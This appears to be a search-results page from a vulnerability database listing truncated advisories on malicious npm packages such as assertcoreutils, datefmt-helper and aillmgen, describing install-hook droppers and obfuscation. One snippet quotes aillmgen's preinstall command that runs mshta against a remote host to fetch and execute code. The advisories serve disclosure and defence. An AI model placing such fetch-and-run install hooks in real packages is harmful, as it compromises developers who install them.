Lucene search
K

9 matches found

OSV
OSV
added 2 days ago5 views

MAL-2026-10491 Malicious code in assertcoreutils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1e53b085bfe045b4aeabe9ad77e1066ab0883f27304197377681191c3118b780 assertcoreutils impersonates the popular chai assertion library: the README, the chai keyword, the lib/chai/ directory layout, and lib/chai.js are...

6.5AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2 days ago8 views

Malicious code in assertcoreutils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1e53b085bfe045b4aeabe9ad77e1066ab0883f27304197377681191c3118b780 assertcoreutils impersonates the popular chai assertion library: the README, the chai keyword, the lib/chai/ directory layout, and lib/chai.js are...

6.5AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/07/04 12:0 a.m.6 views

Malicious code in datefmt-helper (npm)

The npm package datefmt-helper is a supply-chain dropper disguised as a benign date-formatting utility its description reads "dates formatting utility with locale support". The package ships no source repository and places its real behaviour in an install script. A postinstall lifecycle hook...

6.5AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/16 10:22 p.m.12 views

Malicious code in bubblestr (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7831cb93037b6f364e2174f6d4fb64b38bac958e54f3653b8a70810681972172 package.json declares "postinstall": "node index.js", and index.js is a heavily obfuscated single-file script RC4+base64 string-array with rotating...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/16 10:18 p.m.9 views

Malicious code in package-uploader (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 69b86134d9cd019c2d8ad172eed54cd4a48839d69ed2c6af52b79ef5080da765 [email protected] ships an install-hook.js that runs automatically as the npm postinstall script package.json declares "postinstall": "node...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/16 10:9 p.m.14 views

Malicious code in aillmgen (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341 On npm install, the package's preinstall hook preinstall.js runs exec'cmd /c "mshta http://fixars.top"', invoking the Windows mshta.exe binary to fet...

6.7AI score
Exploits0References2
OSV
OSV
added 2026/06/16 10:9 p.m.9 views

MAL-2026-5927 Malicious code in aillmgen (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341 On npm install, the package's preinstall hook preinstall.js runs exec'cmd /c "mshta http://fixars.top"', invoking the Windows mshta.exe binary to fet...

6.7AI score
Exploits0References2
OSV
OSV
added 2026/05/21 4:36 a.m.8 views

MAL-2026-4573 Malicious code in git-userhub (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 859f77ac10aa89722823e0477f8f6986db2b54dd25b1b2aedb05ee31d5891071 Package name 'git-userhub' is a lookalike of a GitHub-related identity, with no legitimate publisher backing. The package.json declares a postinstall...

6.4AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/20 8:40 p.m.15 views

Malicious code in vite-json-config (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9a7c9683fed8b8696938eb7ad88e158f70a075851b0dd511af991ecd69a4d0fd The package presents itself as a vite/tsconfig path helper and clones the public API of tsconfig-paths createMatchPath, matchFromAbsolutePaths,...

6.3AI score
Exploits0References1
Rows per page
Query Builder